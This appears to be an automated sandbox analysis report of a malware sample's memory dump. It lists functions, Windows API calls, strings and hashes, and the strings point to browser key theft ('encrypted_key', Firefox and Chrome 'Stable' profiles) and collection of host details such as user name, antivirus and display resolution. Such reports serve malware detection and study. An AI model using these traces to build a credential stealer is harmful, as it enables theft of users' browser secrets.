lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 00D67601

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

Part of subcall function 00D639EE: GetFileAttributesA.KERNEL32(?,?,?,00D5EA72,?,?,?), ref: 00D639F5

Part of subcall function 00D593A4: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?), ref: 00D593EE
Part of subcall function 00D593A4: lstrlenA.KERNEL32(00000001,?,?,?,?,?,?), ref: 00D5947F

Part of subcall function 00D59148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00D5F752,?,?,?), ref: 00D59163
Part of subcall function 00D59148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00D5F752,?,?,?), ref: 00D5917A
Part of subcall function 00D59148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00D5F752,?,?,?), ref: 00D59191
Part of subcall function 00D59148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00D5F752,?,?,?), ref: 00D591A8
Part of subcall function 00D59148: CloseHandle.KERNEL32(?,?,?,?,?,00D5F752,?,?,?), ref: 00D591D0

Part of subcall function 00D63E7E: GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,00D676A9,?), ref: 00D63E89

StrStrA.SHLWAPI(00000000), ref: 00D676B7
GlobalFree.KERNEL32(?), ref: 00D677DB

Part of subcall function 00D591FF: LocalAlloc.KERNEL32(00000040,?,00000001,?,?,?,?,00D5665F,00000000,?), ref: 00D59239

lstrcatA.KERNEL32(?,00000000), ref: 00D67767
StrCmpCA.SHLWAPI(?,00D876A3), ref: 00D67784
lstrcatA.KERNEL32(?,?), ref: 00D677A3
lstrcatA.KERNEL32(?,00D87ACC), ref: 00D677B4

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Alloc$GlobalLocal_memset$AttributesCloseCreateFolderFreeHandlePathReadSizelstrcpylstrlen
String ID:
API String ID: 3596866618-0
Opcode ID: 8e4e77a7204adcb16463b07c4e3b973ea3b7fb0c5dde60173d9566c156802ca3
Instruction ID: fe5db8dc49035f5682622cbcd5b3caa13e6032d31fae3f0d64a414c587da05de
Opcode Fuzzy Hash: 8e4e77a7204adcb16463b07c4e3b973ea3b7fb0c5dde60173d9566c156802ca3
Instruction Fuzzy Hash: 45812EB1C4012D9BDF60DF64DC45AD9B7BAFB88310F0405E1E908A3250EB729FA98F60

Function 00D7A394 Relevance: 18.1, APIs: 12, Instructions: 95COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00D7A3AD

Part of subcall function 00D758F2: Sleep.KERNEL32(00000000,?), ref: 00D7591A

__calloc_crt.LIBCMT ref: 00D7A3D1
_free.LIBCMT ref: 00D7A3DF
__calloc_crt.LIBCMT ref: 00D7A3ED
_free.LIBCMT ref: 00D7A3FD
_free.LIBCMT ref: 00D7A403
__copytlocinfo_nolock.LIBCMT ref: 00D7A412
__setlocale_nolock.LIBCMT ref: 00D7A41F
_free.LIBCMT ref: 00D7A438
__setmbcp_nolock.LIBCMT ref: 00D7A44A
_free.LIBCMT ref: 00D7A458
_free.LIBCMT ref: 00D7A46C

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: _free$__calloc_crt$Sleep__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
String ID:
API String ID: 3833677464-0
Opcode ID: f773a1bb29e917d2c531c2917c8f0b77b23a962bee4fbfdb58a9d4b57c319673
Instruction ID: 8271e7a1fa213551a17b0b386f7a97e3e45a4eb1fa40bc087a6b6448acda0fd7
Opcode Fuzzy Hash: f773a1bb29e917d2c531c2917c8f0b77b23a962bee4fbfdb58a9d4b57c319673
Instruction Fuzzy Hash: E921A636104A01DBE7227F6CEC4691E77E5EF85750B20C42AF88C56691FE76DC00DA72

Function 00D515D6 Relevance: 18.0, APIs: 12, Instructions: 50windowmemoryregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D515AC: GetProcessHeap.KERNEL32(00000008,000000FF), ref: 00D515B6
Part of subcall function 00D515AC: HeapAlloc.KERNEL32(00000000), ref: 00D515BD

MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 00D515F6
GetLastError.KERNEL32 ref: 00D515FC
SetCriticalSectionSpinCount.KERNEL32(00000000,00000000), ref: 00D51604
GetWindowContextHelpId.USER32(00000000), ref: 00D5160B
GetWindowLongW.USER32(00000000,00000000), ref: 00D51613
RegisterClassW.USER32(00000000), ref: 00D5161A
IsWindowVisible.USER32(00000000), ref: 00D51621
ConvertDefaultLocale.KERNEL32(00000000), ref: 00D51628
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D51634
IsDialogMessageW.USER32(00000000,00000000), ref: 00D5163C
GetProcessHeap.KERNEL32(00000000,?), ref: 00D51646
HeapFree.KERNEL32(00000000), ref: 00D5164D

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Heap$Window$MessageProcess$AllocByteCharClassContextConvertCountCriticalDefaultDialogErrorFreeHelpLastLocaleLongMultiRegisterSectionSpinVisibleWide
String ID:
API String ID: 3627164727-0
Opcode ID: c3abe6958ae258496d8ad0ff6566bbfab8f3cfd3744d769f17d37198e114d48f
Instruction ID: 7f1caee87a6709acdd5b0caaf63215ed216257c640666e31ab0f17eedb8be6e1
Opcode Fuzzy Hash: c3abe6958ae258496d8ad0ff6566bbfab8f3cfd3744d769f17d37198e114d48f
Instruction Fuzzy Hash: 9B015C7A416674FBC7116BA1AD0DEDF3E6CEE4A3927140005F506D12209B34464ADBF9

Function 00D5FABD Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 324COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(8D5052FC), ref: 00D5FB02
StrCmpCA.SHLWAPI(8D5052FC), ref: 00D5FB79
StrCmpCA.SHLWAPI(8D5052FC,firefox), ref: 00D5FE8D
StrCmpCA.SHLWAPI(8D5052FC), ref: 00D5FC6F

Part of subcall function 00D62175: lstrcpyA.KERNEL32(00000000,?,?,00D51CF7,?,00D69260), ref: 00D62194

StrCmpCA.SHLWAPI(8D5052FC), ref: 00D5FD20
StrCmpCA.SHLWAPI(8D5052FC), ref: 00D5FD97

Strings

Stable\, xrefs: 00D5FDB2
firefox, xrefs: 00D5FE87
Stable\, xrefs: 00D5FB94

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: Stable\$ Stable\$firefox
API String ID: 3722407311-2697854757
Opcode ID: f826ffe643a595901092eef57250cba8c76bd384b2dceadb93fa1727be69db94
Instruction ID: 7bfb22c573d27b4162fa8b6cc4af36ed6b796cbe6bdf8384ccc9e274e98a3992
Opcode Fuzzy Hash: f826ffe643a595901092eef57250cba8c76bd384b2dceadb93fa1727be69db94
Instruction Fuzzy Hash: E7C14E32D40509ABCF20FB64ED47AADB775FF44311F550121EE04A7251EA359A1D8BF2

Function 00D6D173 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 175fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(?,?,00000000,?,?), ref: 00D6D1A7
GetFileSize.KERNEL32(?,00000000), ref: 00D6D220
SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 00D6D23C
ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 00D6D250
SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 00D6D259
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 00D6D269
SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 00D6D287
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 00D6D297

Strings

, xrefs: 00D6D1F3

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: File$PointerRead$HandleInformationSize
String ID:
API String ID: 2979504256-3916222277
Opcode ID: bf877e4c61d299ce3cdeb4b810598e3fe509cc57ce10ed60b042a96800da6c83
Instruction ID: b3f5c4ddf26f1d364429f8535d8936b784bd0583349695b3a39768f9f9db4c97
Opcode Fuzzy Hash: bf877e4c61d299ce3cdeb4b810598e3fe509cc57ce10ed60b042a96800da6c83
Instruction Fuzzy Hash: C851F5B1E00218AFDB28DFD5EC85AAEBBBAEF48304F14442AE515E7260D7749D45CF60

Function 00D60F05 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 164COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00D60F49
memmove.MSVCRT(000000FF,?,?,00000000,00000000,?), ref: 00D60F98
_memmove.LIBCMT ref: 00D60FBC
memmove.MSVCRT(00000000,00000000,000000FF,00000000,00000000,?), ref: 00D60FF1
memmove.MSVCRT(000000FF,00000000,?,00000000,00000000,?), ref: 00D61048
memmove.MSVCRT(00000000,00000000,?,?,?,?,?,?,?,?,?,00D88100,00000000,0000000F,75918A60,?), ref: 00D6106D
std::_Xinvalid_argument.LIBCPMT ref: 00D61094

Strings

string too long, xrefs: 00D60F44
invalid string position, xrefs: 00D6108F

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: memmove$Xinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 3430830890-4289949731
Opcode ID: e74f7e0af91e34611bcd332b954a0ab69b6f1ff5fb9f83f5d390ee938073ab07
Instruction ID: 200cc4932f18b0cc89b4b54b250a3c72f2ecd387866ae3e8bc0b1e4b38429fb6
Opcode Fuzzy Hash: e74f7e0af91e34611bcd332b954a0ab69b6f1ff5fb9f83f5d390ee938073ab07
Instruction Fuzzy Hash: 12514A34704144EBDF28DF5CC98596EBBB6EF40710B284929E492DB291CB31ED85DBA4

Function 00D5EB72 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 108stringmemoryCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,?,?,00000000), ref: 00D5EBAB
strchr.MSVCRT ref: 00D5EBBD
strchr.MSVCRT ref: 00D5EBE2
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D5ECE6,?), ref: 00D5EC04
GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,00D5ECE6), ref: 00D5EC11
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00D5ECE6,?), ref: 00D5EC18
strcpy_s.MSVCRT ref: 00D5EC5E

Strings

`Tu, xrefs: 00D5EB9D
0123456789ABCDEF, xrefs: 00D5EB8C

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Heaplstrlenstrchr$AllocProcessstrcpy_s
String ID: 0123456789ABCDEF$`Tu
API String ID: 453150750-1497512213
Opcode ID: 888393bab7950c2b4ec16c9437092b88d670c6b05b4fde73264957ada3eb003d
Instruction ID: 06c8de83d6246048d5bf2bc9cb50bbb3240e637ccd5078fce9519a158c7b699b
Opcode Fuzzy Hash: 888393bab7950c2b4ec16c9437092b88d670c6b05b4fde73264957ada3eb003d
Instruction Fuzzy Hash: E63192729002199FDF04DFE8DC45AEE7BB9EF09311F100169E901FB285DB75AA09CBA0

Function 00D711C2 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77COMMON

Download Yara Rule

APIs

UnDecorator::getArgumentList.LIBCMT ref: 00D711E7

Part of subcall function 00D70D82: Replicator::operator[].LIBCMT ref: 00D70E05
Part of subcall function 00D70D82: DName::operator+=.LIBCMT ref: 00D70E0D

DName::operator+.LIBCMT ref: 00D71240
DName::DName.LIBCMT ref: 00D71298

Strings

void, xrefs: 00D71290
,<ellipsis>, xrefs: 00D71233
..., xrefs: 00D7127B, 00D71287
,..., xrefs: 00D7122C, 00D71238
<ellipsis>, xrefs: 00D71282

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
String ID: ,...$,<ellipsis>$...$<ellipsis>$void
API String ID: 834187326-2211150622
Opcode ID: 984ba1a2f6901ed834bd9b0a181fe98274cfde6638301480ff646e147afbcebe
Instruction ID: 44b85d20c37e72951e7fe18f7b0994db7da3541f241b7a5d673b5183dcbda034
Opcode Fuzzy Hash: 984ba1a2f6901ed834bd9b0a181fe98274cfde6638301480ff646e147afbcebe
Instruction Fuzzy Hash: 032171386003059FCB11DF5CD446AA93BF4EB45789B08C195E949DB372EA31E902CB74

Function 00D72B5B Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

UnDecorator::UScore.LIBCMT ref: 00D72B65
DName::DName.LIBCMT ref: 00D72B71

Part of subcall function 00D7083C: DName::doPchar.LIBCMT ref: 00D7086D

UnDecorator::getScopedName.LIBCMT ref: 00D72BB0
DName::operator+=.LIBCMT ref: 00D72BBA
DName::operator+=.LIBCMT ref: 00D72BC9
DName::operator+=.LIBCMT ref: 00D72BD5
DName::operator+=.LIBCMT ref: 00D72BE2

Strings

void, xrefs: 00D72BC1

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
String ID: void
API String ID: 1480779885-3531332078
Opcode ID: cd78c5adba66be737a3e78327cff68a81372ee6416e9172336b548853b3d0daa
Instruction ID: 743142dc60cf14c43629d9d848fd0eff8227ce4cb9292a9af01238956c73a289
Opcode Fuzzy Hash: cd78c5adba66be737a3e78327cff68a81372ee6416e9172336b548853b3d0daa
Instruction Fuzzy Hash: DD118671500248AFC719EF68C856BB97FB4EB10300F048095E40A9B7E6EB70EA85CB71

Function 00D631BF Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00D631D1
GetDeviceCaps.GDI32(00000000,00000008), ref: 00D631DC
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00D631E7
ReleaseDC.USER32(00000000,00000000), ref: 00D631F2
GetProcessHeap.KERNEL32(00000000,00000104,?,?,00D65DD5,?,Display Resolution: ,00D87934,00000000,User Name: ,00D87924,00000000,Computer Name: ,00D87910,AV: ,00D87904), ref: 00D631FE
HeapAlloc.KERNEL32(00000000,?,?,00D65DD5,?,Display Resolution: ,00D87934,00000000,User Name: ,00D87924,00000000,Computer Name: ,00D87910,AV: ,00D87904,Install Date: ), ref: 00D63205
wsprintfA.USER32 ref: 00D63217

Part of subcall function 00D62143: lstrcpyA.KERNEL32(00000000,00000000,?,00D68FC1,00D87786,?,?,?,?,00D69D6E), ref: 00D62169

Strings

%dx%d, xrefs: 00D63211

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
String ID: %dx%d
API String ID: 3940144428-2206825331
Opcode ID: f8d261d2020e06a701a03c01f706e6513941008a591e380f61f8e5ea749d8ba5
Instruction ID: d717323959beae51fee0e7cb607fce366899e2a65e540aa363510fcdf07be0ed
Opcode Fuzzy Hash: f8d261d2020e06a701a03c01f706e6513941008a591e380f61f8e5ea749d8ba5
Instruction Fuzzy Hash: F9F04F72602228BBD7612BA59C0DDAB7E6CEF46BA1B000056F605D2161D6B44D50A7F5

Function 00D56719 Relevance: 13.6, APIs: 9, Instructions: 110networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00D62175: lstrcpyA.KERNEL32(00000000,?,?,00D51CF7,?,00D69260), ref: 00D62194

